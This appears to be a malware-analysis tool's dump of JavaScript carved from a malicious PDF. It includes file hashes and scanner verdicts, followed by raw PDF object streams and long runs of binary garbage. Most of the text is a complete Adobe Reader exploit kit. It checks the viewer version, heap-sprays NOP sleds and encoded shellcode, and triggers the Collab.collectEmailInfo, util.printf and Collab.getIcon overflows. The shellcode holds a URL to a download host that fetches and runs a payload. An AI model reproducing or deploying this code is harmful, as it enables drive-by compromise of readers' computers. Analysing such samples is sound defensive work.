hIH=0x30303030;zmP=Xez("\u4343\u4343\u4343\u0FEB\u335B\u66C9\u80B9\u8001\uEF33\uE243\uEBFA\uE805\uFFEC\uFFFF\u8B7F\uDF4E\uEFEF\u64EF\uE3AF\u9F64\u42F3\u9F64\u6EE7\uEF03\uEFEB\u64EF\uB903\u6187\uE1A1\u0703\uEF11\uEFEF\uAA66\uB9EB\u7787\u6511\u07E1\uEF1F\uEFEF\uAA66\uB9E7\uCA87\u105F\u072D\uEF0D\uEFEF\uAA66\uB9E3\u0087\u0F21\u078F\uEF3B\uEFEF\uAA66\uB9FF\u2E87\u0A96\u0757\uEF29\uEFEF\uAA66\uAFFB\uD76F\u9A2C\u6615\uF7AA\uE806\uEFEE\uB1EF\u9A66\u64CB\uEBAA\uEE85\u64B6\uF7BA\u07B9\uEF64\uEFEF\u87BF\uF5D9\u9FC0\u7807\uEFEF\u66EF\uF3AA\u2A64\u2F6C\u66BF\uCFAA\u1087\uEFEF\uBFEF\uAA64\u85FB\uB6ED\uBA64\u07F7\uEF8E\uEFEF\uAAEC\u28CF\uB3EF\uC191\u288A\uEBAF\u8A97\uEFEF\u9A10\u64CF\uE3AA\uEE85\u64B6\uF7BA\uAF07\uEFEF\u85EF\uB7E8\uAAEC\uDCCB\uBC34\u10BC\uCF9A\uBCBF\uAA64\u85F3\uB6EA\uBA64\u07F7\uEFCC\uEFEF\uEF85\u9A10\u64CF\uE7AA\uED85\u64B6\uF7BA\uFF07\uEFEF\u85EF\u6410\uFFAA\uEE85\u64B6\uF7BA\uEF07\uEFEF\uAEEF\uBDB4\u0EEC\u0EEC\u0EEC\u0EEC\u036C\uB5EB\u64BC\u0D35\uBD18\u0F10\u64BA\u6403\uE792\uB264\uB9E3\u9C64\u64D3\uF19B\uEC97\uB91C\u9964\uECCF\uDC1C\uA626\u42AE\u2CEC\uDCB9\uE019\uFF51\u1DD5\uE79B\u212E\uECE2\uAF1D\u1E04\u11D4\u9AB1\uB50A\u0464\uB564\uECCB\u8932\uE364\u64A4\uF3B5\u32EC\uEB64\uEC64\uB12A\u2DB2\uEFE7\u1B07\u1011\uBA10\uA3BD\uA0A2\uEFA1\u7468\u7074\u2F3A\u6E2F\u6363\u6E63\u6E6E\u2E63\u6E63\u692F\u676D\u6C2F\u616F\u2E64\u6870\u3F70\u3D61\u2661\u7473\u493D\u746E\u7265\u656E\u2074\u7845\u6C70\u726F\u7265\u3720\u302E\u577C\u6E69\u6F64\u7377\u5820\u5D50\u265D\u3D65\u0031\u0000");var brl=0x400000;var thD=zmP.length*2;var Dan=brl-(thD+0x38);var RKg=Xez("\u9090\u9090");RKg=TbO(RKg,Dan);var DzR=(hIH-0x400000)/brl;for(var yMS=0;yMS<DzR;yMS++){ADP[yMS]=RKg+zmP;}
var GjC="44606420085485426596";for(Xez=0;Xez<138*2;Xez++){GjC+="2";}
util.printf("%45000f",GjC);}
function DIG(hjP)
{hjP=hjP.replace(/[\+1]/g,"0");hjP=hjP.replace(/[\+2]/g,"9");hjP=hjP.replace(/[\+3]/g,"8");hjP=hjP.replace(/[\+4]/g,"7");hjP=hjP.replace(/[\+5]/g,"6");hjP=hjP.replace(/[\+6]/g,"5");hjP=hjP.replace(/[\+7]/g,"4");hjP=hjP.replace(/[\+8]/g,"3");hjP=hjP.replace(/[\+9]/g,"2");hjP=hjP.replace(/[\+0]/g,"1");return hjP;}
function pnYmx(){var BeyfM=Xez("\u4343\u4343\u4343\u0FEB\u335B\u66C9\u80B9\u8001\uEF33\uE243\uEBFA\uE805\uFFEC\uFFFF\u8B7F\uDF4E\uEFEF\u64EF\uE3AF\u9F64\u42F3\u9F64\u6EE7\uEF03\uEFEB\u64EF\uB903\u6187\uE1A1\u0703\uEF11\uEFEF\uAA66\uB9EB\u7787\u6511\u07E1\uEF1F\uEFEF\uAA66\uB9E7\uCA87\u105F\u072D\uEF0D\uEFEF\uAA66\uB9E3\u0087\u0F21\u078F\uEF3B\uEFEF\uAA66\uB9FF\u2E87\u0A96\u0757\uEF29\uEFEF\uAA66\uAFFB\uD76F\u9A2C\u6615\uF7AA\uE806\uEFEE\uB1EF\u9A66\u64CB\uEBAA\uEE85\u64B6\uF7BA\u07B9\uEF64\uEFEF\u87BF\uF5D9\u9FC0\u7807\uEFEF\u66EF\uF3AA\u2A64\u2F6C\u66BF\uCFAA\u1087\uEFEF\uBFEF\uAA64\u85FB\uB6ED\uBA64\u07F7\uEF8E\uEFEF\uAAEC\u28CF\uB3EF\uC191\u288A\uEBAF\u8A97\uEFEF\u9A10\u64CF\uE3AA\uEE85\u64B6\uF7BA\uAF07\uEFEF\u85EF\uB7E8\uAAEC\uDCCB\uBC34\u10BC\uCF9A\uBCBF\uAA64\u85F3\uB6EA\uBA64\u07F7\uEFCC\uEFEF\uEF85\u9A10\u64CF\uE7AA\uED85\u64B6\uF7BA\uFF07\uEFEF\u85EF\u6410\uFFAA\uEE85\u64B6\uF7BA\uEF07\uEFEF\uAEEF\uBDB4\u0EEC\u0EEC\u0EEC\u0EEC\u036C\uB5EB\u64BC\u0D35\uBD18\u0F10\u64BA\u6403\uE792\uB264\uB9E3\u9C64\u64D3\uF19B\uEC97\uB91C\u9964\uECCF\uDC1C\uA626\u42AE\u2CEC\uDCB9\uE019\uFF51\u1DD5\uE79B\u212E\uECE2\uAF1D\u1E04\u11D4\u9AB1\uB50A\u0464\uB564\uECCB\u8932\uE364\u64A4\uF3B5\u32EC\uEB64\uEC64\uB12A\u2DB2\uEFE7\u1B07\u1011\uBA10\uA3BD\uA0A2\uEFA1\u7468\u7074\u2F3A\u6E2F\u6363\u6E63\u6E6E\u2E63\u6E63\u692F\u676D\u6C2F\u616F\u2E64\u6870\u3F70\u3D61\u2661\u7473\u493D\u746E\u7265\u656E\u2074\u7845\u6C70\u726F\u7265\u3720\u302E\u577C\u6E69\u6F64\u7377\u5820\u5D50\u265D\u3D65\u0033\u0000\u0000");gbD=Xez("\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090")+BeyfM;nlU=Xez("\u9090\u9090");Ody=5*2;TBy=Ody+gbD.length;while(nlU.length<TBy)nlU+=nlU;ujw=nlU.substring(0,TBy);sxI=nlU.substring(0,nlU.length-TBy);while(sxI.length+TBy<0x40000)sxI=sxI+sxI+ujw;VaE=[];for(lqQ=0;lqQ<180;lqQ++)VaE[lqQ]=sxI+gbD;var zMy=4012;var cWB=Array(zMy);for(lqQ=0;lqQ<zMy;lqQ++)
{cWB[lqQ]=Xez("\u000a\u000a\u000a\u000a");}
Collab.getIcon(cWB+"_N.bundle");}
|
|||
generic_stage_recovery_001.js |
deobfuscated-js | generic stage recovery split-literal-normalize from combined JavaScript objects at offset 0x497 | 13579 bytes |
SHA-256: f3809fd555098a18eea8cf3261fbb2cc4bb1fca2794a4c7703c354fc24940afb |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 3 eval/decoder/string-building token(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
var Xez=unescape,Fqx=app.viewerVersion.toString(),YDg=Xez("t\h\i\s");YDg=eval(YDg);if(Fqx<8)
{MXVBj();}
if(Fqx>=8&&Fqx<9)
{obk();}
if(Fqx<=9)
{pnYmx();}
function eTRTT(sAZQH,uJqqU){while(sAZQH.length*2<uJqqU){sAZQH+=sAZQH;}
return sAZQH.substring(0,uJqqU/2);}
function MXVBj(){var rcbcz=Xez("\uC033\u8B64\u3040\u0C78\u408B\u8B0C\u1C70\u8BAD\u0858\u09EB\u408B\u8D34\u7C40\u588B\u6A3C\u5A44\uE2D1\uE22B\uEC8B\u4FEB\u525A\uEA83\u8956\u0455\u5756\u738B\u8B3C\u3374\u0378\u56F3\u768B\u0320\u33F3\u49C9\u4150\u33AD\u36FF\uBE0F\u0314\uF238\u0874\uCFC1\u030D\u40FA\uEFEB\u3B58\u75F8\u5EE5\u468B\u0324\u66C3\u0C8B\u8B48\u1C56\uD303\u048B\u038A\u5FC3\u505E\u8DC3\u087D\u5257\u33B8\u8ACA\uE85B\uFFA2\uFFFF\uC032\uF78B\uAEF2\uB84F\u2E65\u7865\u66AB\u6698\uB0AB\u8A6C\u98E0\u6850\u6E6F\u642E\u7568\u6C72\u546D\u8EB8\u0E4E\uFFEC\u0455\u5093\uC033\u5050\u8B56\u0455\uC283\u837F\u31C2\u5052\u36B8\u2F1A\uFF70\u0455\u335B\u57FF\uB856\uFE98\u0E8A\u55FF\u5704\uEFB8\uE0CE\uFF60\u0455\u7468\u7074\u2F3A\u6E2F\u6363\u6E63\u6E6E\u2E63\u6E63\u692F\u676D\u6C2F\u616F\u2E64\u6870\u3F70\u3D61\u2661\u7473\u493D\u746E\u7265\u656E\u2074\u7845\u6C70\u726F\u7265\u3720\u302E\u577C\u6E69\u6F64\u7377\u5820\u5D50\u265D\u3D65\u0032\u0000\u0000\u0000\x23\x42\x23\x42\x23\x42\x23\x42");var CAAND=0x0c0c0c0c;var BmNBH=[];var Efzsp=0x400000;var AOPlD=rcbcz.length*2;var uJqqU=Efzsp-(AOPlD+0x38);var sAZQH=Xez("\u9090\u9090");sAZQH=eTRTT(sAZQH,uJqqU);var ZVpAM=(CAAND-0x400000)/Efzsp;for(var XhpXX=0;XhpXX<ZVpAM;XhpXX++){BmNBH[XhpXX]=sAZQH+rcbcz;}
var uOXiu=Xez("\u0c0c\u0c0c");while(uOXiu.length<44952)uOXiu+=uOXiu;this.collabStore=Collab.collectEmailInfo({subj:"",msg:uOXiu});}
function obk(){var ADP=new Array();function TbO(RKg,Dan){while(RKg.length*2<Dan){RKg+=RKg;}
RKg=RKg.substring(0,Dan/2);return RKg;}
hIH=0x30303030;zmP=Xez("\u4343\u4343\u4343\u0FEB\u335B\u66C9\u80B9\u8001\uEF33\uE243\uEBFA\uE805\uFFEC\uFFFF\u8B7F\uDF4E\uEFEF\u64EF\uE3AF\u9F64\u42F3\u9F64\u6EE7\uEF03\uEFEB\u64EF\uB903\u6187\uE1A1\u0703\uEF11\uEFEF\uAA66\uB9EB\u7787\u6511\u07E1\uEF1F\uEFEF\uAA66\uB9E7\uCA87\u105F\u072D\uEF0D\uEFEF\uAA66\uB9E3\u0087\u0F21\u078F\uEF3B\uEFEF\uAA66\uB9FF\u2E87\u0A96\u0757\uEF29\uEFEF\uAA66\uAFFB\uD76F\u9A2C\u6615\uF7AA\uE806\uEFEE\uB1EF\u9A66\u64CB\uEBAA\uEE85\u64B6\uF7BA\u07B9\uEF64\uEFEF\u87BF\uF5D9\u9FC0\u7807\uEFEF\u66EF\uF3AA\u2A64\u2F6C\u66BF\uCFAA\u1087\uEFEF\uBFEF\uAA64\u85FB\uB6ED\uBA64\u07F7\uEF8E\uEFEF\uAAEC\u28CF\uB3EF\uC191\u288A\uEBAF\u8A97\uEFEF\u9A10\u64CF\uE3AA\uEE85\u64B6\uF7BA\uAF07\uEFEF\u85EF\uB7E8\uAAEC\uDCCB\uBC34\u10BC\uCF9A\uBCBF\uAA64\u85F3\uB6EA\uBA64\u07F7\uEFCC\uEFEF\uEF85\u9A10\u64CF\uE7AA\uED85\u64B6\uF7BA\uFF07\uEFEF\u85EF\u6410\uFFAA\uEE85\u64B6\uF7BA\uEF07\uEFEF\uAEEF\uBDB4\u0EEC\u0EEC\u0EEC\u0EEC\u036C\uB5EB\u64BC\u0D35\uBD18\u0F10\u64BA\u6403\uE792\uB264\uB9E3\u9C64\u64D3\uF19B\uEC97\uB91C\u9964\uECCF\uDC1C\uA626\u42AE\u2CEC\uDCB9\uE019\uFF51\u1DD5\uE79B\u212E\uECE2\uAF1D\u1E04\u11D4\u9AB1\uB50A\u0464\uB564\uECCB\u8932\uE364\u64A4\uF3B5\u32EC\uEB64\uEC64\uB12A\u2DB2\uEFE7\u1B07\u1011\uBA10\uA3BD\uA0A2\uEFA1\u7468\u7074\u2F3A\u6E2F\u6363\u6E63\u6E6E\u2E63\u6E63\u692F\u676D\u6C2F\u616F\u2E64\u6870\u3F70\u3D61\u2661\u7473\u493D\u746E\u7265\u656E\u2074\u7845\u6C70\u726F\u7265\u3720\u302E\u577C\u6E69\u6F64\u7377\u5820\u5D50\u265D\u3D65\u0031\u0000");var brl=0x400000;var thD=zmP.length*2;var Dan=brl-(thD+0x38);var RKg=Xez("\u9090\u9090");RKg=TbO(RKg,Dan);var DzR=(hIH-0x400000)/brl;for(var yMS=0;yMS<DzR;yMS++){ADP[yMS]=RKg+zmP;}
var GjC="44606420085485426596";for(Xez=0;Xez<138*2;Xez++){GjC+="2";}
util.printf("%45000f",GjC);}
function DIG(hjP)
{hjP=hjP.replace(/[\+1]/g,"0");hjP=hjP.replace(/[\+2]/g,"9");hjP=hjP.replace(/[\+3]/g,"8");hjP=hjP.replace(/[\+4]/g,"7");hjP=hjP.replace(/[\+5]/g,"6");hjP=hjP.replace(/[\+6]/g,"5");hjP=hjP.replace(/[\+7]/g,"4");hjP=hjP.replace(/[\+8]/g,"3");hjP=hjP.replace(/[\+9]/g,"2");hjP=hjP.replace(/[\+0]/g,"1");return hjP;}
function pnYmx(){var BeyfM=Xez("\u4343\u4343\u4343\u0FEB\u335B\u66C9\u80B9\u8001\uEF33\uE243\uEBFA\uE805\uFFEC\uFFFF\u8B7F\uDF4E\uEFEF\u64EF\uE3AF\u9F64\u42F3\u9F64\u6EE7\uEF03\uEFEB\u64EF\uB903\u6187\uE1A1\u0703\uEF11\uEFEF\uAA66\uB9EB\u7787\u6511\u07E1\uEF1F\uEFEF\uAA66\uB9E7\uCA87\u105F\u072D\uEF0D\uEFEF\uAA66\uB9E3\u0087\u0F21\u078F\uEF3B\uEFEF\uAA66\uB9FF\u2E87\u0A96\u0757\uEF29\uEFEF\uAA66\uAFFB\uD76F\u9A2C\u6615\uF7AA\uE806\uEFEE\uB1EF\u9A66\u64CB\uEBAA\uEE85\u64B6\uF7BA\u07B9\uEF64\uEFEF\u87BF\uF5D9\u9FC0\u7807\uEFEF\u66EF\uF3AA\u2A64\u2F6C\u66BF\uCFAA\u1087\uEFEF\uBFEF\uAA64\u85FB\uB6ED\uBA64\u07F7\uEF8E\uEFEF\uAAEC\u28CF\uB3EF\uC191\u288A\uEBAF\u8A97\uEFEF\u9A10\u64CF\uE3AA\uEE85\u64B6\uF7BA\uAF07\uEFEF\u85EF\uB7E8\uAAEC\uDCCB\uBC34\u10BC\uCF9A\uBCBF\uAA64\u85F3\uB6EA\uBA64\u07F7\uEFCC\uEFEF\uEF85\u9A10\u64CF\uE7AA\uED85\u64B6\uF7BA\uFF07\uEFEF\u85EF\u6410\uFFAA\uEE85\u64B6\uF7BA\uEF07\uEFEF\uAEEF\uBDB4\u0EEC\u0EEC\u0EEC\u0EEC\u036C\uB5EB\u64BC\u0D35\uBD18\u0F10\u64BA\u6403\uE792\uB264\uB9E3\u9C64\u64D3\uF19B\uEC97\uB91C\u9964\uECCF\uDC1C\uA626\u42AE\u2CEC\uDCB9\uE019\uFF51\u1DD5\uE79B\u212E\uECE2\uAF1D\u1E04\u11D4\u9AB1\uB50A\u0464\uB564\uECCB\u8932\uE364\u64A4\uF3B5\u32EC\uEB64\uEC64\uB12A\u2DB2\uEFE7\u1B07\u1011\uBA10\uA3BD\uA0A2\uEFA1\u7468\u7074\u2F3A\u6E2F\u6363\u6E63\u6E6E\u2E63\u6E63\u692F\u676D\u6C2F\u616F\u2E64\u6870\u3F70\u3D61\u2661\u7473\u493D\u746E\u7265\u656E\u2074\u7845\u6C70\u726F\u7265\u3720\u302E\u577C\u6E69\u6F64\u7377\u5820\u5D50\u265D\u3D65\u0033\u0000\u0000");gbD=Xez("\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090")+BeyfM;nlU=Xez("\u9090\u9090");Ody=5*2;TBy=Ody+gbD.length;while(nlU.length<TBy)nlU+=nlU;ujw=nlU.substring(0,TBy);sxI=nlU.substring(0,nlU.length-TBy);while(sxI.length+TBy<0x40000)sxI=sxI+sxI+ujw;VaE=[];for(lqQ=0;lqQ<180;lqQ++)VaE[lqQ]=sxI+gbD;var zMy=4012;var cWB=Array(zMy);for(lqQ=0;lqQ<zMy;lqQ++)
{cWB[lqQ]=Xez("\u000a\u000a\u000a\u000a");}
Collab.getIcon(cWB+"_N.bundle");}
app.eval();
app.eval();
endstream
endobj
73 0 obj<</Subtype/XML/Length 224/Type/Metadata>>stream
©N> u «а©1XЄѕ»&Ї Єш'v/щ(шпС;с-nsd02`Б№Ђ0_5¦ћќ9%lч|Ъ|5‘•@ Ж‹эся ЄLД" –Љ “©д«9иhS/ќkSЃcш-2T†ЮсѕqИ ЊѓМwF} oN РХbљEИ iH\\ Лт
endstream
endobj
116 0 obj
<</ / / / /Filter/#46#6c#61#74#65#44#65#63#6f#64#65/Length 2000+035>>
stream
x^�X�r�8 }�W�T5S��q@� ���U L�SN2�'� +�%{��ʲ#K�/� �s��c�� �]�҂��F 8������ه�u���/�G����� ��o|> �ޏg �gӍ�ٻ��xz����� ���v�ã���� �5�<�t1�
� �p��zk7� ���no�u�e��t?�Ha ���6K�Χ �^
�`1ݟc�g㝷;;���^�/����{/GǓq�ژ�����ͥL��R>�f6�/f�g���b�]�j]�HW�Z�{ä�����ۅ ��z�p�dÅV� .Tm�p�)��W�p�� |� R�C�� �R�Ѱ�5msG+SiX�U ~H��4 ?Ԕf��y�W�T�� ���,��� [��N?Z[�Q�Q�&B� J�N1���dE]�&�p �61 >(P� x��f���X#*� 43 �D�=Wg�ȹB@<��\�2��\JV�| ��f��V�gmT ��H�\� ��X9���j� =l]Us^��*�*%e�� �-�U!b�] ~ ⱎԘ�y6 �xű� rU�� �<�``e� 1 ��4���<3�� ƠB i� ���� Ѷ� �˾ :��� �uRӛ�A���4&XQ�<-�7�����^8���1� Y��ϭ�9�� T-�; �� w-� V&�\�6� kl)���o�Bt,Wjj '� t��� j�S7 '!5�6�r�4�0/�J�s�/1X��#7 R�lu��Ө���Z� Q�L�� �����Q'o�U �6�U��
?+�2���, >� t�m���US�K���
ӟ��/�ݏ�% \_�C#� JX��7�� �� v�b�+Z}u�];�@�-p �@�� ��<�31���y�]v%��a�^�$���YW����ÇR
�sSL�q�����-��%v�� �����6.� i E\-��|���,+�'�~) ��������d2�{7?���Z�� �����x�5=8�� fO~�t�O/ ۯ+(+�/ [5o���˳j6 ] ��0 g�u������hz����
� N� ��@9Z x� ޗ ��;�z�- ������mB2��Tߣ��:���4�R��PE����!�U���Nᔶ(�b��D�& =���3�AW���� ��vlB�� �8�"m�� rL�(M*b�mu ��:Ue� ^*���49�� �I8�&tꊚ�ʉ�6�]��BW| � ͠1 �N�iV� M�:
�Y �V�H xF��kV1¶�D��J� &a�l�f ��G�|�H
Y��j��E %� O�� e�;A���� �y ~ kb�S ��! X�6�h�FV chUG� Yu��oW
M�3~o r��V�(��n���'!u5m5=�IA uDu�� Vŝ��JX�2��|w�U� ��%* ���\M�����F�<8u,���\ NH 9v ��� y
�v�X r� O�/� �<>��d\ *�w���[o $��3{Aj�C��#>o� W� ��|��>�6c�}�ɍ� ;��+�]�ͪ��e
�1)��b�}�� (���yS�S� '*K+ֲ�ͪ�+��Ƙc ��A � �҄�,� �V1�yH +u�4�E��s��IT�rFv# +Z�m� �/�V���� �6�����ԏD��3��� �rr*�1{��#�H��?�
�H�YV���d��Ϗ� @�Z�Q Jh>�Bz�v��,[���M���$ ��~[vQQ�Uk����W��P�A7��O�hT�] ?�Z� ղ6�rR��,3
�(�6���ާ0 q� 4 ���f��O)Gt �~�I;p�� O6��h3?�v~�:�N�@��~砳 ͕ �l��=:y� .� � ���d�?�� ���/ �;L����H�G�Z�� i&R��4 �yDjD�?"�"� �:��G��H�G�J� ��V I��|�|d��Ə� ��Z���⩥` zj)�Z
y�����A xn_4 � ���}A�\�D��2����� ��߿� ����т��� �>NƲ�\�F���K ���_� '_���
��˭ �oN��������u ���K� �� �2x?
|���q��74�����O�� �b�WD�G���^o_��JR��� _��d��[� G`- ��@�u��qeFrsV(���ˢ��|k�lڅe���W�N7�@ S��& cj� (�H/x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�
endstream
endobj
95 0 obj
<</ / / / /Direction/L2R/ / / />>
endobj
1990 0 obj
<</ / / / /S/#4a#61#76#61#53#63#72#69#70#74/JS 116 0 R/ / / />>
endobj
95 0 obj
<</ / / / /Direction/L2R/ / / />>
endobj
1 0 obj
<</ / / / /Typp/Action/S/#47#6f#54#6f/D[9 0 /XYZ 0 504 #31]/ / / />>
endobj
5 0 obj
<</ / / / /Typp/Action/S/#47#6f#54#6f/D[9 0 /XYZ 0 504 #31]/ / / />>
endobj
9 0 obj
<</ / / / /count 2/Type/Pages/Kids[1894 0 R]/ / / />>
endobj
123 0 obj
<</ / / / /Length 0000>>
stream
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
endstream
endobj
23 0 obj<</CropBox[0 0 595.22 842]/Parent 62 0 R/Contents 25 0 R/Rotate 0/MediaBox[0 0 595.22 842]/Resources 24 0 R/Type/Page>>
endobj
24 0 obj<</ColorSpace<</Cs6 59 0 R>>/Font<</TT2 52 0 R/TT3 54 0 R/TT4 45 0 R>>/ProcSet[/PDF/Text]/ExtGState<</GS1 57 0 R>>>>
endobj
25 0 obj[26 0 R 27 0 R 28 0 R]
endobj
26 0 obj<</Length 3>>stream
Y.в
endstream
endobj
91 0 obj
<</ / / / /S/JavaScript/JS 123 0 R/ / / />>
endobj
xref
trailer
<<
/Root 15 0 R
>>
startxrefx� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �
|
|||
combined_document_js_000.js |
deobfuscated-js | combined document JavaScript streams at offset 0x497 | 13600 bytes |
SHA-256: 967057264398409a2b43a6d32c0c8b998266e669342a2a8527c00339054f7498 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 3 eval/decoder/string-building token(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
var Xez=unescape,Fqx=app.viewerVersion.toString(),YDg=Xez("t\h\i\s");YDg=eval(YDg);if(Fqx<8)
{MXVBj();}
if(Fqx>=8&&Fqx<9)
{obk();}
if(Fqx<=9)
{pnYmx();}
function eTRTT(sAZQH,uJqqU){while(sAZQH.length*2<uJqqU){sAZQH+=sAZQH;}
return sAZQH.substring(0,uJqqU/2);}
